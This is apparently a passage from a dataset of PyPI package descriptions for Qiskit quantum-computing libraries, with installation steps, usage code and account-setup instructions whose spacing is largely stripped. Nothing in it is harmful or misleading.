windowQuantum CircuitIt takes in the Python code and the names of the variables in the circuit you want to convert.\nThe Python code can be imported by dragging and dropping or by importing a file.MatrixTakes in a matrix written in Python syntax, the number of qubits, and whether the circuit is observed or not.Acknowledgement\uad6d\ubb38 : \"\ubcf8 \uc5f0\uad6c\ub294 2022\ub144 \uacfc\ud559\uae30\uc220\uc815\ubcf4\ud1b5\uc2e0\ubd80 \ubc0f \uc815\ubcf4\ud1b5\uc2e0\uae30\ud68d\ud3c9\uac00\uc6d0\uc758 SW\uc911\uc2ec\ub300\ud559\uc0ac\uc5c5\uc758 \uc5f0\uad6c\uacb0\uacfc\ub85c \uc218\ud589\ub418\uc5c8\uc74c\"(2022-0-00964)English : \"This research was supported by the MIST(Ministry of Science, ICT), Korea, under the National Program for Excellence in SW), supervised by the IITP(Institute of Information & communications Technology Planning & Evaluation) in 2022\"(2022-0-00964)LicenseQiskit-Classroom is licensed under the Apache License, Version 2.0"} +{"package": "qiskit-classroom-converter", "pacakge-description": "qiskit-classroom-converterQiskit classroom ConverterDocumentshttps://kmu-quantum-classroom.github.io/qiskit-classroom-converter/qiskit_class_converter.htmlOfficial USER Guidehttps://kmu-quantum-classroom.github.io/documents/overview.htmlSupport convert methodquantum circuit to bra-ket notationquantum circuit to matrixmatrix to quantum circuitstring to bra-ket notationOptionsconvert methodoptionQC_TO_BRA_KETexpression{simplify, expand}, print{raw}QC_TO_MATRIXprint{raw}MATRIX_TO_QClabel{str}STR_TO_BRA_KETprint{raw}fromqiskit_class_converterimportConversionServiceConversionService(conversion_type=\"QC_TO_BRA_KET\",option={\"expression\":\"simplify\"})Required dataMATRIX_TO_QCUser's QuantumCircuit objectfromqiskitimportQuantumCircuitfromqiskit_class_converterimportConversionServiceinput_value=[[1,0,0,0],[0,0,0,1],[0,0,1,0],[0,1,0,0]]sample_converter=ConversionService(conversion_type=\"MATRIX_TO_QC\")result=sample_converter.convert(input_value=input_value)# using user's QuantumCircuit objectquantum_circuit=QuantumCircuit(2,2)quantum_circuit.append(result,[0,1])How to Installpipinstallqiskit-classroom-converterDocker Pull & RunAlternative installation with docker image.dockerpullghcr.io/kmu-quantum-classroom/qiskit-classroom-converter\ndockerrun-p8888:8888ghcr.io/kmu-quantum-classroom/qiskit-classroom-converterDependenciesqiskitUsagefromqiskitimportQuantumCircuitfromqiskit_class_converterimportConversionService# quantum circuit to matrixquantum_circuit=QuantumCircuit(2,2)quantum_circuit.x(0)quantum_circuit.cx(0,1)sample_converter=ConversionService(conversion_type=\"QC_TO_MATRIX\")result=sample_converter.convert(input_value=quantum_circuit)code :example.pyHow to test the softwarepython-munittest-vortoxARM PlatformMac ARM chips users may have issues running this package.We have provided a Dockerfile, which can be used docker-compose.docker-composeup--buildAcknowledgement\uad6d\ubb38 : \"\ubcf8 \uc5f0\uad6c\ub294 2022\ub144 \uacfc\ud559\uae30\uc220\uc815\ubcf4\ud1b5\uc2e0\ubd80 \ubc0f \uc815\ubcf4\ud1b5\uc2e0\uae30\ud68d\ud3c9\uac00\uc6d0\uc758 SW\uc911\uc2ec\ub300\ud559\uc0ac\uc5c5\uc758 \uc5f0\uad6c\uacb0\uacfc\ub85c \uc218\ud589\ub418\uc5c8\uc74c\"(2022-0-00964)English : \"This research was supported by the MIST(Ministry of Science, ICT), Korea, under the National Program for Excellence in SW), supervised by the IITP(Institute of Information & communications Technology Planning & Evaluation) in 2022\"(2022-0-00964)"} +{"package": "qiskit-cold-atom", "pacakge-description": "Qiskit cold atom is an open-source library to describe cold atomic quantum\nexperiments in a gate- and circuit-based framework."} +{"package": "qiskit-debugger", "pacakge-description": "Breakpoint Debugging on a Physical Qunatum CircuitProblem DescriptionIn classical computing, debugging with breakpoint means halting the program\nexecution at any given point and freezing the program state. This allows\nprogrammers to examine the program internals mid-execution (as in, what\nvariables contain which values, analyze control flow etc.) Unfortunately, in\nquantum computing, doing this is not possible. Qubits in a quantum circuit have\nprobabilistic values (in superposition), and the act of measuring collapses the\nqubits to a deterministic state.Breakpoint debugging is still needed for quantum computing, so our problem boils\ndown to measuring at the breakpoint and preserving enough information to\n\u201crecreate\u201d that state and continue execution from that point.Group MembersPalvit Garg (pgarg5)Harshwardhan Joshi (hjoshi2)Shawn Salekin (ssaleki)PresentationURLQuickstartInstall with pippip install qiskit_debuggerImport the following the classes to experiment with the debugger like this:from qiskit_debugger import QuantumDebugCircuit, QCDebugger, run_circuitA motivating example of how to use the debugger classes:qc = QuantumDebugCircuit(2)\nqc.x(0)\nqc.h(range(2))\nqc.cx(0, 1)\nqc.h(range(2))\nqc.bp() # <-- Add a breakpoint here\nqc.h(range(2))\nqc.x(range(2))\nqc.bp() # <-- Add a breakpoint here\nqc.cx(1, 0)\nqc.h(range(2))\nqc.bp()\n\nqc.draw()\n\n# run each breakpoints\nqdb = QCDebugger(qc)\nqdb.c()\nqdb.c()\nqdb.c()\nqdb.c()Run the circuit as a whole w/o debuggerqc.measure_all()\nresult = run_circuit(qc)\nprint(result.get_counts())If you want to use hardware you have to initiate theQCDebuggerlike so:from qiskit import IBMQ\n\n# loading IBMQ account\nIBMQ.load_account()\nprovider = IBMQ.get_provider(hub='ibm-q-ncsu', group='nc-state', project='grad-qc-class')\n# This is important, fill up the hw_backend variable like this.\nhw_backend = provider.get_backend('ibm_oslo')\n\nqdb = QCDebugger(qc, use_hardware=True)Solution ApproachesLet\u2019s assume we have a circuit with multiple qubits, and it has a breakpoint\nbrk. The circuit before the breakpoint is called A, and after is called B. The\ntarget is to measure the state of qubits at point brk.To \u201crecreate\u201d, i.e., synthesize an equivalent circuit right after it is\nmeasured, we thought of two possible methods.1.Approach 1:\nWe make two circuits of varying length: one ends at the breakpoint, and the\nother stops at the original end without stopping at the breakpoint. Then we run\nboth of these circuits.(update 11/05/22): since this is a trivial and inefficient implementation, we\nwill focus our attention to approach 2.Approach 2:\nCreate a custom gate using the unitary matrix that results from running circuit\npart A, save it somewhere. Then create a custom gate using the saved unitary\nmatrix to circuit part B.This custom gate is equivalent to the circuit part A.\nNow run this custom gate and then part B.Final ResultWe have successfully implemented the first approach which uses a combination of simulation and hardware.\nUsing unitary matrices from unitary simulator runs and actual output from hardware runs,\nwe were able to correctly re-create the qubit states pre-measurement, and were able to successfully\nresume the circuit after the breakpoint. Our implementation is readily usable as well. Our expectation with limited erorr propagation with this approach is alsoverified. This approach can aid the quantum computing programmers in interacting with\nand debugging their code in a more effective way, as long as the circuit width isn't too big.On the other hand, we found that the pure hardware approach is cumbersome and expensive to implement. The key driver behind\nthis approach is Quantum Phase Estimation, and while there are a number of algorithms uses this sub-routine, in\npractice it is a) not very precise, b) hard to implement, and c) limits the number of breakpoints to a handful\ndue to error propagation.Open ProblemsImplement a comprehensive test suite for the debugger implmentationWork out a way to extend the QPE and the hardware approach to extend to 2-,3-, and more qubit circuitsContributions During the Final RoundResearch and experiments with pure hawrdware approach - PalvitExperiments and implementation with simulator approach - ShawnBenchmakring, experiments, and final reports - HarshProgress Made (Round 2)Synthesized a new circuit based on a unitary matrix and run it on a real\nhardware.Assessed the importance of phase date in synthesizing a circuit from breakpointInvestigated different methods of generating unitary matricesTimeline (Detailed & Revised)Confirm whether and under what condition we can generate a unitary from a\nhardware run (11/12/2022)Decide whether to use simulation or hardware based on the outcome of\ngenerating unitary from the hardware runs (11/12/2022)Validate whether the phase data obtained from simulation(s) can be used in\nsynthesizing an equivalent circuit after a breakpointFigure out a method to extract phase data from parallel simulation runs (11/19/2022)Implement a qiskit module/extension that would allow qiskit users to add\nbreakpoint(s) to their circuit.(11/26/2022)Add tests and run a number of experiments to validate the correctness of our\nimplementation.(11/26/2022)Project Timeline (Original)11/01/2022: Implement approach 111/10/2022: Analyze the feasibility of implementing approach 2.11/26/2022: Implement approach 2 (or a better one)Future Readingshttps://dl.acm.org/doi/abs/10.1145/3373376.3378488https://arxiv.org/pdf/2103.09172.pdfReferenceshttps://qiskit.org/documentation/tutorials/circuits_advanced/02_operators_overview.htmlhttps://qiskit.org/documentation/stubs/qiskit.converters.circuit_to_instruction.htmlhttps://github.ncsu.edu/fmuelle/qc19/tree/master/hw/hw6/m3/csc591-quantum-debugginghttps://quantumcomputing.stackexchange.com/questions/27064/how-to-get-statevector-of-qubits-after-running-quantum-circuits-on-ibmq-real-har"} +{"package": "qiskit-dell-runtime", "pacakge-description": "Qiskit Dell RuntimeQiskit Dell Runtime is aQiskit Runtimeplatform that can execute classical-quantum code on both local and on-premise environments. With this platform, hybrid classical-quantum code bundle can be developed and executed. Powered by Qiskit Runtime API, this execution model provides close-integration of classical and quantum execution.Various simulation, emulation and quantum hardware can be integrated with this platform. Developers can abstract their source code with Qiskit, so that execution can be ported across execution environments with minimum effort.At this time the Qiskit-Dell-Runtime has been tested on Linux and Windows.Getting Started with QiskitThe Qiskit Dell Runtime is an platform for running hybrid classical-quantum algorithms in local and remote execution environments. To get started using the platform, it is recommended that you have some experience with Qiskit first.You can find plenty of tutorials and introductory materials provided by Qiskithere.ArchitectureThis platform provides both client-side provider and server-side components.Client-side ProviderUsers would need to install theDellRuntimeProvideron client devices. The provider is defaulted to local execution and can be used out of the box. This provider can also be used to connect with platform running on a server-side, so that users can control server and execute jobs by using the same API.Server-side ComponentsThis platform has a minimalist design to create a light-weighted execution environment for server-side components. It contains anorchestratorlong-running microservice that listens to requests fromDellRuntimeProvider.At runtime, when a job is started by user, a new pod will be created to execute both classical and vQPU workload.For deployment installation, please visit thislink.Database ConfigurationAll user-uploaded code and execution parameters will be stored in a database. By default, this platform comes with amysqldeployment. If users would like to customize database to another database service, please view these installations for database configuration.SSOSSO integration is off by default, so that users can easily set up a sandbox environment. There is existing integration hooks built into the platform for easy integration with various SSO systems.Multi-Backend SupportBy default, the quantum execution will be processed byQiskit Aersimulation engine. Users can modify the quantum backend by specifyingbackend-namein the job input parameter. Custom code adjustment can be made to support multipleQiskit backends, including other emulation, simulation and QPU backends.Emulation vs SimulationWhile simulation engines execute quantum circuits to measure probablistic outcome, emulation engines calculate outcome for algorithms with deterministic calculations.The Hybrid Emulation Platform can support both simulation and emulation,depending on the backend used.You can read about the VQE example provided inour documentationor in aQiskit Tutorialif you want to learn more about when it may be beneficial to use either emulation or simulation over the other.Emulations for different use cases are under-development, and we are looking for feedback to better prioritize on use cases. If you have a use-case in mind, please contact us atv.fong@dell.com.Documentation Links:IntroductionInstallation GuideRequirementsClient Quick Start GuideServer Quick Start GuideConfiguring Custom SSOConfiguring Custom DatabaseUsageLocal Execution SetupRemote Execution SetupProgram UploadExecutionObtaining Results(Optional) Callback Function(Optional) Backend SelectionExamplesLocal ExecutionRemote ExecutionQKAVQEFor any questions or feedback, please contactv.fong@dell.com"} +{"package": "qiskit-dynamics", "pacakge-description": "Qiskit DynamicsThis repo is still in the early stages of development, there will be breaking API changesQiskit Dynamics is an open-source project for building, transforming, and solving time-dependent\nquantum systems in Qiskit.The goal of Qiskit Dynamics is to provide access to different numerical methods for solving\ndifferential equations, and to automate common processes typically performed by hand, e.g. applying\nframe transformations or rotating wave approximations to system and control Hamiltonians.Qiskit Dynamics can be configured to use eitherNumPyorJAXas the backend for array operations.NumPyis the default, andJAXis\nan optional dependency.JAXprovides just-in-time compilation,\nautomatic differentiation, and GPU execution, and therefore is well-suited to tasks involving\nrepeated evaluation of functions with different parameters; E.g. simulating a model of a quantum\nsystem over a range of parameter values, or optimizing the parameters of control sequence.Reference documentation may be foundhere, includingtutorials,user guide,API reference, andDiscussions.InstallationQiskit Dynamics may be installed using pip via:pip install qiskit-dynamicsAdditionally, Qiskit Dynamics may be installed simultaneously with the CPU version of\nJAX via:pip install \"qiskit-dynamics[jax]\"Installing JAX with GPU support must be done manually, for instructions refer to theJAX installation guide.Contribution GuidelinesIf you'd like to contribute to Qiskit Dynamics, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to uphold this code.We useGitHub issuesfor tracking\nrequests and bugs. Pleasejoin the Qiskit Slack communityand use our#qiskit-dynamicschannel for discussion and simple\nquestions. For questions that are more suited for a forum we use the Qiskit tag in theStack Exchange.Authors and CitationQiskit Dynamics is the work ofmany peoplewho\ncontribute to the project at different levels. If you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0"} +{"package": "qiskit-experiments", "pacakge-description": "Qiskit ExperimentsQiskit Experimentsis a repository that builds tools for building, running,\nand analyzing experiments on noisy quantum computers using Qiskit.To learn more about the package, you can see themost up-to-date documentationcorresponding to the main branch of this repository or thedocumentation for the latest stable release.Contribution GuidelinesIf you'd like to contribute to Qiskit Experiments, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to\nuphold this code.We useGitHub issuesfor\ntracking requests and bugs. Pleasejoin the Qiskit Slack communityand use the#experimentschannel for discussion and\nsimple questions.\nFor questions that are more suited for a forum we use the Qiskit tag inStack Exchange.Authors and CitationQiskit Experiments is the work ofmany peoplewho contribute\nto the project at different levels. If you use Qiskit Experiments, please cite ourpaperas per the includedcitation file.LicenseApache License 2.0"} +{"package": "qiskit-finance", "pacakge-description": "Qiskit FinanceQiskit Financeis an open-source framework that contains uncertainty components for stock/securities problems,\napplications, such as portfolio optimization, and data providers to source real or random data to\nfinance experiments.InstallationWe encourage installing Qiskit Finance via the pip tool (a python package manager).pipinstallqiskit-financepipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Finance, then you can install from source.\nTo do this follow the instructions in thedocumentation.Creating Your First Finance Programming Experiment in QiskitNow that Qiskit Finance is installed, it's time to begin working with the finance module.\nLet's try an experiment using Amplitude Estimation algorithm to\nevaluate a fixed income asset with uncertain interest rates.importnumpyasnpfromqiskit.primitivesimportSamplerfromqiskit_algorithmsimportAmplitudeEstimationfromqiskit_finance.circuit.libraryimportNormalDistributionfromqiskit_finance.applicationsimportFixedIncomePricing# Create a suitable multivariate distributionnum_qubits=[2,2]bounds=[(0,0.12),(0,0.24)]mvnd=NormalDistribution(num_qubits,mu=[0.12,0.24],sigma=0.01*np.eye(2),bounds=bounds)# Create fixed income componentfixed_income=FixedIncomePricing(num_qubits,np.eye(2),np.zeros(2),cash_flow=[1.0,2.0],rescaling_factor=0.125,bounds=bounds,uncertainty_model=mvnd,)# the FixedIncomeExpectedValue provides us with the necessary rescalings# create the A operator for amplitude estimationproblem=fixed_income.to_estimation_problem()# Set number of evaluation qubits (samples)num_eval_qubits=5# Construct and run amplitude estimationsampler=Sampler()algo=AmplitudeEstimation(num_eval_qubits=num_eval_qubits,sampler=sampler)result=algo.estimate(problem)print(f\"Estimated value:\\t{fixed_income.interpret(result):.4f}\")print(f\"Probability:\\t{result.max_probability:.4f}\")When running the above the estimated value result should be 2.46 and probability 0.8487.Further examplesLearning path notebooks may be found in thefinance tutorialssection\nof the documentation and are a great place to start.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines.\nThis project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Pleasejoin the Qiskit Slack communityand for discussion and simple questions.\nFor questions that are more suited for a forum, we use theQiskittag inStack Overflow.Authors and CitationFinance was inspired, authored and brought about by the collective work of a team of researchers.\nFinance continues to grow with the help and work ofmany people, who contribute\nto the project at different levels.\nIf you use Qiskit, please cite as per the providedBibTeX file.LicenseThis project uses theApache License 2.0."} +{"package": "qiskitflow", "pacakge-description": "QiskitFlow. Reproducible quantum experiments.Platform for tracking, sharing and running quantum experiments in a clean and understandable for developers, researchers and students manner.Alpha release is in the works.\nFiles from hackathon project are located inhackathon folderGeneral overviewHot to runOverview / FlowInstallationCode annotationCLIExperiment runs listExperiment run informationShare experimentExamplesRun server and UI on your machineUIFlowFlow of actions while using QiskitFlow is following:InstallQiskitFlow if not installed yetAnnotateyour code withExperimentabstraction QiskitFlow library providesRun your code as usual: QiskitFlow will write metadata of your experiment execution in local folderYou can review experiments usingCLI interfaceWe are tracking metrics, parameters, state vectors and counts of experiments.\nArtifacts, circuits, sourcecode and other useful things are on their way.Note: qiskitflow creates_experimentsfolder in place of execution of code, where all serialized information is stored in json format, so it's easy to track it even in gitInstallationpipinstallqiskitflowCode annotationLibrary for quantum programs annotationSample example of annotation:fromqiskitflowimportExperimentwithExperiment(\"awesome_experiment\")asexperiment:# your quantum program here!experiment.write_metric(\"test metric\",0.1)experiment.write_metric(\"test metric 2\",2)experiment.write_parameter(\"test parameter\",\"test parameter value\")experiment.write_parameter(\"test parameter 2\",\"test paraeter value 2\")experiment.write_counts(\"measurement\",{\"00\":1024,\"11\":0})Full example with quantum teleportationimportnumpyasnpimporttimefromqiskitimportQuantumCircuit,QuantumRegister,ClassicalRegister,execute,BasicAer,IBMQfromqiskit.visualizationimportplot_histogram,plot_bloch_multivectorfromqiskit.extensionsimportInitializefromqiskit_textbook.toolsimportrandom_state,array_to_latexfromqiskitflowimportExperimentwithExperiment(\"quantum teleportation\")asexperiment:start_time=time.time()# conduct experiment as usualpsi=random_state(1)init_gate=Initialize(psi)init_gate.label=\"init\"inverse_init_gate=init_gate.gates_to_uncompute()qr=QuantumRegister(3,name=\"q\")crz=ClassicalRegister(1,name=\"crz\")crx=ClassicalRegister(1,name=\"crx\")qc=QuantumCircuit(qr,crz,crx)qc.append(init_gate,[0])qc.barrier()create_bell_pair(qc,1,2)qc.barrier()alice_gates(qc,0,1)measure_and_send(qc,0,1)bob_gates(qc,2,crz,crx)qc.append(inverse_init_gate,[2])cr_result=ClassicalRegister(1)qc.add_register(cr_result)qc.measure(2,2)backend_name=\"qasm_simulator\"backend=BasicAer.get_backend(backend_name)counts=execute(qc,backend,shots=1024).result().get_counts()end_time=time.time()runtime=end_time-start_time# qiskitflow =========# log parameters usedexperiment.write_parameter(\"backend name\",backend_name)# log metrics of experimentexperiment.write_metric(\"runtime\",runtime)# log counts of experimentexperiment.write_counts(\"experiment counts\",counts)CLIList of experiment runsqiskitflowruns[--search=][--experiment=][--order_by=][--order_type=]experiments list screenshotExperiment run informationqiskitflowrunexperiment information screenshotsExperiment informationShare experiment runqiskitflowshare--user=--password=--host=--port=Example for local backend serverqiskitflowshare86b6e7ba32f04d34b842a91079482454--user=--password=--host=http://localhost--port=8000experiment share screenshotsExperiment informationExamplesJupyter notebook with quantum teleportation exampleRun localInstalldocker composeRundocker-composeupUIScreenshotsExperiment information"} +{"package": "qiskit-han", "pacakge-description": "A Quantum backend provider"} +{"package": "qiskit-hangyul", "pacakge-description": "A Quantum backend provider"} +{"package": "qiskit-honeywell-provider", "pacakge-description": "Qiskit Honeywell ProviderQiskitis an open-source framework for working with noisy quantum computers at the level of pulses, circuits, and algorithms.This project contains a provider that allows access to Honeywell quantum\ndevices.InstallationYou can install the provider using pip:pip3installqiskit-honeywell-providerpipwill handle installing all the python dependencies automatically and you\nwill always install the latest version.Setting up the Honeywell ProviderOnce the package is installed, you can access the provider from Qiskit via the following import:fromqiskit.providers.honeywellimportHoneywellYou will need credentials for the Honeywell Quantum Service. Credentials are\ntied to an e-mail address that can be stored on disk with:Honeywell.save_account('username@company.com')After the initial saving of your account information, you will be prompted to enter\nyour password which will be used to acquire a token that will enable continuous\ninteraction until it expires. Your password willnotbe saved to disk and will\nbe required infrequently to update the credentials stored on disk or when a new\nmachine must be authenticated.The credentials will then be loaded automatically on calls that return Backends,\nor can be manually loaded with:Honeywell.load_account()This will load the most recently saved credentials from disk so that they can be provided\nfor each interaction with Honeywell's devices.Storing a new account willnotinvalidate your other stored credentials. You may have an arbitrary\nnumber of credentials saved. To delete credentials you can use:Honeywell.delete_credentials()Which will delete the current accounts credentials from the credential store. Please keep in mind\nthis only deletes the current accounts credentials, and not all credentials stored.With credentials loaded you can access the backends from the provider:backends=Honeywell.backends()backend=Honeywell.get_backend(device)You can then use that backend like you would use any other qiskit backend. For\nexample, running a bell state circuit:fromqiskitimport*qc=QuantumCircuit(2,2)qc.h(0)qc.cx(0,1)qc.measure([0,1],[0,1])result=execute(qc,backend).result()print(result.get_counts(qc))Using a proxyTo configure a proxy include it in the save account configuration:Honeywell.save_account('username@company.com',proxies={'urls':{'http':'http://user:password@myproxy:8080','https':'http://user:password@myproxy:8080'}})To remove the proxy you can save with an empty dictionary:Honeywell.save_account('username@company.com',proxies={})The 'urls' field must be a dictionary that maps a protocol type or url to a specific proxy. Additional information/details can be foundhere.LicenseApache License 2.0."} +{"package": "qiskit-ibm-experiment", "pacakge-description": "Qiskit IBM Experiment serviceQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a service that allows accessing theIBM Quantumexperiment database.InstallationThe provider can be installed via pip:pipinstallqiskit-ibm-experimentProvider SetupCreate an IBM Quantum account or log in to your existing account by visiting theIBM Quantum login page.Ensure you have access to the experiment database.Copy (and/or optionally regenerate) your API token from yourIBM Quantum account page.Take your token from step 2, here calledMY_API_TOKEN, and save it by callingIBMExperimentService.save_account():fromqiskit_ibm_experimentimportIBMExperimentServiceIBMExperimentService.save_account(token='MY_API_TOKEN')The command above stores your credentials locally in a configuration file calledqiskit-ibm.json. By default, this file is located in$HOME/.qiskit, where$HOMEis your home directory.Once saved you can then instantiate the experiment service without using the API token:fromqiskit_ibm_experimentimportIBMExperimentServiceservice=IBMExperimentService()# display current supported backendsprint(service.backends())# get the latest experiments in the DBexperiment_list=service.experiments()You can also save specific configuration under a given name:fromqiskit_ibm_experimentimportIBMExperimentServiceIBMExperimentService.save_account(name='my_config',token='MY_API_TOKEN')And explicitly load it:fromqiskit_ibm_experimentimportIBMExperimentServiceservice=IBMExperimentService(name='my_config')# display current supported backendsprint(service.backends())Load Account from Environment VariablesAlternatively, the IBM Provider can discover credentials from environment variables:exportQISKIT_IBM_EXPERIMENT_TOKEN='MY_API_TOKEN'exportQISKIT_IBM_EXPERIMENT_URL='https://auth.quantum-computing.ibm.com/api'Then instantiate the provider without any arguments and access the backends:fromqiskit_ibm_experimentimportIBMExperimentServiceservice=IBMExperimentService()Environment variable take precedence over the default account saved to disk viasave_account,\nif one exists; but if thenameparameter is given, the environment variables are ignored.Enable Account for Current SessionAs another alternative, you can also enable an account just for the current session by instantiating the service with the tokenfromqiskit_ibm_experimentimportIBMExperimentServiceservice=IBMExperimentService(token='MY_API_TOKEN')Contribution GuidelinesIf you'd like to contribute to IBM Quantum Experiment Service, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct.\nBy participating, you are expect to uphold to this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use the\ninvite link atQiskit.org. For questions that are more suited for a forum we\nuse theQiskittag inStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from ourQiskit Tutorialrepository.Authors and CitationThe Qiskit IBM Quantum Experiment Service is the work ofmany peoplewho contribute to the\nproject at different levels. If you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0."} +{"package": "qiskit-ibm-provider", "pacakge-description": "Qiskit IBM Quantum ProviderQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a provider that allows accessing theIBM Quantumsystems and simulators.Migrating from qiskit-ibmq-providerIf you are familiar with theqiskit-ibmq-providerrepository, check out themigration guide.InstallationYou can install the provider using pip:pipinstallqiskit-ibm-providerProvider SetupCreate an IBM Quantum account or log in to your existing account by visiting theIBM Quantum login page.Copy (and/or optionally regenerate) your API token from yourIBM Quantum account page.Take your token from step 2, here calledMY_API_TOKEN, and save it by callingIBMProvider.save_account():fromqiskit_ibm_providerimportIBMProviderIBMProvider.save_account(token='MY_API_TOKEN')The command above stores your credentials locally in a configuration file calledqiskit-ibm.json. By default, this file is located in$HOME/.qiskit, where$HOMEis your home directory.\nOnce saved you can then instantiate the provider like below and access the backends:fromqiskit_ibm_providerimportIBMProviderprovider=IBMProvider()# display current supported backendsprint(provider.backends())# get IBM's simulator backendsimulator_backend=provider.get_backend('ibmq_qasm_simulator')Load Account from Environment VariablesAlternatively, the IBM Provider can discover credentials from environment variables:exportQISKIT_IBM_TOKEN='MY_API_TOKEN'Then instantiate the provider without any arguments and access the backends:fromqiskit_ibm_providerimportIBMProviderprovider=IBMProvider()Enable Account for Current SessionAs another alternative, you can also enable an account just for the current session by instantiating the provider with the token.fromqiskit_ibm_providerimportIBMProviderprovider=IBMProvider(token='MY_API_TOKEN')Next StepsNow you're set up and ready to check out some of the tutorials.IBM Quantum LearningQiskitContribution GuidelinesIf you'd like to contribute to qiskit-ibm-provider, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct.\nBy participating, you are expect to uphold to this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community, use the\ninvite linkhere.Authors and CitationThe Qiskit IBM Quantum Provider is the work ofmany peoplewho contribute to the\nproject at different levels. If you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0."} +{"package": "qiskit-ibmq-provider", "pacakge-description": "Qiskit IBM Quantum Provider (NOW DEPRECATED)PLEASE NOTE:As of version 0.20.0, released in January 2023,qiskit-ibmq-providerhas been deprecated\nwith its support ending and eventual archival being no sooner than 3 months from that date. The\nfunction provided byqiskit-ibmq-provideris not going away rather it has being split out to separate repositories.\nPlease see theMigration Guidessection below for more detail. We encourage you\nto migrate over at your earliest convenience.Qiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This module contains a provider that allows accessing theIBM Quantumsystems and simulators.Migration GuidesAll the functionality thatqiskit-ibmq-providerprovides has been migrated to other packages:FormerlyCurrent packageDetailsMigration Guideqiskit.providers.ibmq.experimentqiskit-ibm-experiment(no docs yet)For the features related with the IBM Quantum experiment database service.guideqiskit.providers.ibmq.runtimeqiskit-ibm-runtime(docs)Use this package if you prefer getting high quality probability distribution or expectation values without having to optimize the circuits or mitigate results yourself.guideRest ofqiskit.providers.ibmqqiskit-ibm-provider(docs)Use this package if you need direct access to the backends to do experiments like device characterization.guideThese packages can be installed by themselves (via the standard pip install command, e.g.pip install qiskit-ibm-provider) and are not part of the Qiskit metapackage.InstallationWe encourage installing Qiskit via the PIP tool (a python package manager),\nwhich installs all Qiskit elements and components, including this one.pipinstallqiskitPIP will handle all dependencies automatically for us and you will always\ninstall the latest (and well-tested) version.To install from source, follow the instructions in thecontribution guidelines.Setting up the IBM Quantum ProviderOnce the package is installed, you can access the provider from Qiskit.Note: Since November 2019 (and with version0.4of thisqiskit-ibmq-providerpackage / version0.14of theqiskitpackage)\nlegacy Quantum Experience or QConsole (v1) accounts are no longer supported.\nIf you are still using a v1 account, please follow the steps described inupdate instructionsto update your account.Configure your IBM Quantum credentialsCreate an IBM Quantum account or log in to your existing account by visiting\ntheIBM Quantum login page.Copy (and/or optionally regenerate) your API token from yourIBM Quantum account page.Take your token from step 2, here calledMY_API_TOKEN, and run:fromqiskitimportIBMQIBMQ.save_account('MY_API_TOKEN')The command above stores your credentials locally in a configuration file calledqiskitrc.\nBy default, this file is located in$HOME/.qiskit, where$HOMEis your home directory. If\nyou are still usingQconfig.py, please delete that file and run the command above.Accessing your IBM Quantum backendsAfter callingIBMQ.save_account(), your credentials will be stored on disk.\nOnce they are stored, at any point in the future you can load and use them\nin your program simply via:fromqiskitimportIBMQprovider=IBMQ.load_account()backend=provider.get_backend('ibmq_qasm_simulator')Alternatively, if you do not want to save your credentials to disk and only\nintend to use them during the current session, you can use:fromqiskitimportIBMQprovider=IBMQ.enable_account('MY_API_TOKEN')backend=provider.get_backend('ibmq_qasm_simulator')By default, all IBM Quantum accounts have access to the same, open project\n(hub:ibm-q, group:open, project:main). For convenience, theIBMQ.load_account()andIBMQ.enable_account()methods will return a provider\nfor that project. If you have access to other projects, you can use:provider_2=IBMQ.get_provider(hub='MY_HUB',group='MY_GROUP',project='MY_PROJECT')Updating to the new IBM QuantumSince November 2019 (and with version0.4of thisqiskit-ibmq-providerpackage), the IBM Quantum Provider only supports the newIBM Quantum, dropping\nsupport for the legacy Quantum Experience and Qconsole accounts. The new IBM Quantum is also referred asv2, whereas the legacy one and Qconsole asv1.This section includes instructions for updating your accounts and programs.\nPlease note that:the IBM Quantum Experiencev1credentials and the programs written for pre-0.3\nversions will still be working during the0.3.xseries. From 0.4 onwards,\nonlyv2credentials are supported, and it is recommended to upgrade\nin order to take advantage of the new features.updating your credentials to the IBM Quantumv2implies that you\nwill need to update your programs. The sections below contain instructions\non how to perform the transition.Updating your IBM Quantum credentialsIf you have credentials for the legacy Quantum Experience or Qconsole stored in\ndisk, you can make use ofIBMQ.update_account()helper. This helper will read\nyour current credentials stored in disk and attempt to convert them:fromqiskitimportIBMQIBMQ.update_account()Found 2 credentials.\nThe credentials stored will be replaced with a single entry with token \"MYTOKEN\"\nand the new IBM Quantum v2 URL (https://auth.quantum-computing.ibm.com/api).\n\nIn order to access the provider, please use the new \"IBMQ.get_provider()\" methods:\n\n provider0 = IBMQ.load_account()\n provider1 = IBMQ.get_provider(hub='A', group='B', project='C')\n\nNote you need to update your programs in order to retrieve backends from a\nspecific provider directly:\n\n backends = provider0.backends()\n backend = provider0.get_backend('ibmq_qasm_simulator')\n\nUpdate the credentials? [y/N]Upon confirmation, your credentials will be overwritten with a valid IBM Quantum\nv2 set of credentials. For more complex cases, consider deleting your\nprevious credentials viaIBMQ.delete_accounts()and follow the instructions\nin theIBM Quantum account page.Updating your programsThe new IBM Quantum support also introduces a more structured approach for accessing backends.\nPreviously, access to all backends was centralized through:IBMQ.backends()IBMQ.get_backend('ibmq_qasm_simulator')In version0.3onwards, the preferred way to access the backends is via aProviderfor one of your projects instead of via the globalIBMQinstance\ndirectly, allowing for more granular control over\nthe project you are using:my_provider=IBMQ.get_provider()my_provider.backends()my_provider.get_backend('ibmq_qasm_simulator')In a similar 